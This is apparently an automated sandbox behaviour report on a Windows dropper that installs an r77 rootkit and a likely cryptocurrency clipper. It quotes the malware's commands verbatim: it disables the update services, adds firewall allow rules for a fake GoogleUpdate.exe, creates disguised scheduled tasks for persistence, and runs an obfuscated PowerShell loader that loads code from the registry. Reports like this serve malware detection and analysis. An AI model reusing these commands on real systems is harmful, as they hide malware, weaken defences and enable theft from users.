Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0	Jump to behavior
Source: C:\Windows\GoogleUpdate.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Windows\GoogleUpdate.exe" "Google Updater" ENABLE ALL
Source: C:\Windows\GoogleUpdate.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="Google Updater" dir=in action=allow program="C:\Windows\GoogleUpdate.exe" enable=yes
Source: C:\Windows\GoogleUpdate.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="Google Updater" dir=out action=allow program="C:\Windows\GoogleUpdate.exe" enable=yes
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /TR "C:\Users\user\AppData\LocalLow\MfU3390p.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /TR "C:\Users\user\AppData\LocalLow\MfU3390p.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{946476e5-3894-42c2-b536-7341f926cc1f}

Source: C:\Users\user\Desktop\Installer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe

File created: C:\Users\user\AppData\Local\Temp\7321.tmp

Jump to behavior

Source: C:\Windows\System32\dialer.exe

Code function: 55_2_00007FF6CF7414C0 CoInitialize,CoCreateInstance,CoUninitialize,

55_2_00007FF6CF7414C0

Source: softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: sqlite3.dll.0.dr, nss3.dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %s
Source: sqlite3.dll.0.dr, nss3.dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: sqlite3.dll.0.dr, nss3.dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: sqlite3.dll.0.dr, nss3.dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: sqlite3.dll.0.dr, nss3.dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: sqlite3.dll.0.dr	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: sqlite3.dll.0.dr, nss3.dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: Installer.exe, 00000000.00000003.344003514.0000000004834000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: sqlite3.dll.0.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: sqlite3.dll.0.dr	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Mutant created: \Sessions\1\BaseNamedObjects\Microsoft{5a7c2b28-e152-4c69-88f1-288764f0bf1a}
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5216:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:60:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5416:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3692:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1868:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5812:120:WilError_01
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Mutant created: \Sessions\1\BaseNamedObjects\PiAlAaAa__shmem3_winpthreads_tdm_
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5292:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5868:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2472:120:WilError_01
Source: C:\Users\user\Desktop\Installer.exe	Mutant created: \Sessions\1\BaseNamedObjects\43264363457643587374357347463
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1252:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4184:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4312:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5204:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2620:120:WilError_01
Source: C:\Windows\GoogleUpdate.exe	Mutant created: \Sessions\1\BaseNamedObjects\GoogleUpdate{825b2ad2-5778-421f-86b5-fbf0592aa463}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:920:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:2416:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1992:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2440:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5256:120:WilError_01

Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Command line argument: pGt	42_2_00F216C0
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Command line argument: pGt	42_2_00F216C0
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Command line argument: P^w	42_2_00F216C0
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Command line argument: DH^.	42_2_00F216C0
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Command line argument: bc1q	42_2_00F216C0
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Command line argument: ltc1	42_2_00F216C0
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Command line argument: Rz(C	42_2_00F216C0
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Command line argument: pGt	52_2_00F216C0
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Command line argument: pGt	52_2_00F216C0
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Command line argument: P^w	52_2_00F216C0
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Command line argument: DH^.	52_2_00F216C0
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Command line argument: bc1q	52_2_00F216C0
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Command line argument: ltc1	52_2_00F216C0
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Command line argument: Rz(C	52_2_00F216C0

Source: C:\Users\user\Desktop\Installer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\GoogleUpdate.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\GoogleUpdate.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: C:\Users\user\Desktop\Installer.exe	Automated click: Run
Source: C:\Users\user\Desktop\Installer.exe	Automated click: Run
Source: C:\Users\user\Desktop\Installer.exe	Automated click: Run
Source: C:\Users\user\Desktop\Installer.exe	Automated click: Run

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Installer.exe

Static file information: File size 10032128 > 1048576

Source: Installer.exe	Static PE information: Raw size of .dfghf0 is bigger than: 0x100000 < 0x614800
Source: Installer.exe	Static PE information: Raw size of .dfghf2 is bigger than: 0x100000 < 0x2f4200

Source:	Binary string: freebl3.pdb source: freebl3.dll.0.dr
Source:	Binary string: softokn3.pdbp source: softokn3.dll.0.dr
Source:	Binary string: GoogleUpdate_unsigned.pdb source: OBH7JYJN.exe, 00000004.00000002.450413724.0000000001D3B000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000000.415884336.0000000000F81000.00000020.00000001.01000000.0000000E.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\Release\r77-x86.pdb source: GoogleUpdate.exe, 00000022.00000002.624884003.00000000007D0000.00000040.00000400.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000002.646049748.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, MfU3390p.exe, 0000002A.00000002.631428646.0000000000C20000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\InstallStager\obj\Release\InstallStager.pdb source: 1u8JL0XE.exe, 00000001.00000002.489371945.000001FAF7FB2000.00000004.00000020.00020000.00000000.sdmp, dialer.exe
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\InstallStager\obj\Release\InstallStager.pdb- source: 1u8JL0XE.exe, 00000001.00000002.489371945.000001FAF7FB2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: NtjHIfvQ.exe, 00000026.00000002.626071532.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, NtjHIfvQ.exe, 00000026.00000002.627158411.0000000001010000.00000040.00001000.00020000.00000000.sdmp, audiodg.exe, 00000045.00000002.647679469.000001E0E6C60000.00000040.00001000.00020000.00000000.sdmp, audiodg.exe, 00000045.00000002.646633753.000001E0E69F0000.00000040.00000001.00020000.00000000.sdmp, dllhost.exe, 00000046.00000002.623052699.0000000140000000.00000040.00000001.00020000.00000000.sdmp, dllhost.exe, 00000046.00000002.630153308.0000023BED1B0000.00000040.00000001.00020000.00000000.sdmp, dllhost.exe, 00000046.00000002.628757594.0000023BED180000.00000040.00000001.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: nss3.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\x64\Release\Install.pdb source: 1u8JL0XE.exe, 00000001.00000002.489371945.000001FAF7FB2000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000037.00000000.485066902.00007FF6CF74D000.00000002.00000001.01000000.00000000.sdmp, dialer.exe, 00000037.00000002.492907036.00007FF6CF74D000.00000002.00000001.01000000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\x64\Release\InstallService64.pdb source: dllhost.exe, 00000046.00000002.623052699.0000000140000000.00000040.00000001.00020000.00000000.sdmp, dllhost.exe, 00000046.00000000.589427793.0000000140000000.00000040.00000001.00020000.00000000.sdmp, dllhost.exe, 00000046.00000000.587739120.0000000140000000.00000040.00000001.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Windows\GoogleUpdate.exe

Unpacked PE file: 34.2.GoogleUpdate.exe.f80000.2.unpack .text:ER;.data:W;.idata:R;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;

Obfuscated command line found

Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"

Source: C:\Users\user\Desktop\Installer.exe	Code function: 0_2_00A58D20 push esi; ret	0_2_00B20F1A
Source: C:\Users\user\Desktop\Installer.exe	Code function: 0_2_00A58D20 push esi; ret	0_2_00CAC56E
Source: C:\Users\user\Desktop\Installer.exe	Code function: 0_2_00A897B0 push esi; ret	0_2_00AB8607
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 42_2_00F2DD34 push ecx; ret	42_2_00F2DD47
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 52_2_00F2DD34 push ecx; ret	52_2_00F2DD47
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 58_2_00007FF8163F09AB push eax; retf	58_2_00007FF8163F0C01

Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe

Code function: 1_2_00007FF738DB1DD0 GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,

1_2_00007FF738DB1DD0

Source: NtjHIfvQ.exe.0.dr

Static PE information: 0xC91EEA10 [Thu Dec 3 18:40:16 2076 UTC]

Source: Installer.exe	Static PE information: section name: .dfghf0
Source: Installer.exe	Static PE information: section name: .dfghf1
Source: Installer.exe	Static PE information: section name: .dfghf2
Source: 1u8JL0XE.exe.0.dr	Static PE information: section name: .xdata
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: sqlite3.dll.0.dr	Static PE information: section name: /4
Source: sqlite3.dll.0.dr	Static PE information: section name: /19
Source: sqlite3.dll.0.dr	Static PE information: section name: /31
Source: sqlite3.dll.0.dr	Static PE information: section name: /45
Source: sqlite3.dll.0.dr	Static PE information: section name: /57
Source: sqlite3.dll.0.dr	Static PE information: section name: /70
Source: sqlite3.dll.0.dr	Static PE information: section name: /81
Source: sqlite3.dll.0.dr	Static PE information: section name: /92
Source: updater.exe.1.dr	Static PE information: section name: .xdata
Source: 7321.tmp.1.dr	Static PE information: section name: _RDATA

Source: initial sample

Static PE information: section where entry point is pointing to: .dfghf2

Source: 1u8JL0XE.exe.0.dr	Static PE information: real checksum: 0x2ce193 should be: 0x2c34ee
Source: MfU3390p.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x1938e
Source: 7321.tmp.1.dr	Static PE information: real checksum: 0x0 should be: 0x5841e
Source: updater.exe.1.dr	Static PE information: real checksum: 0x2ce193 should be: 0x2c34ef

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
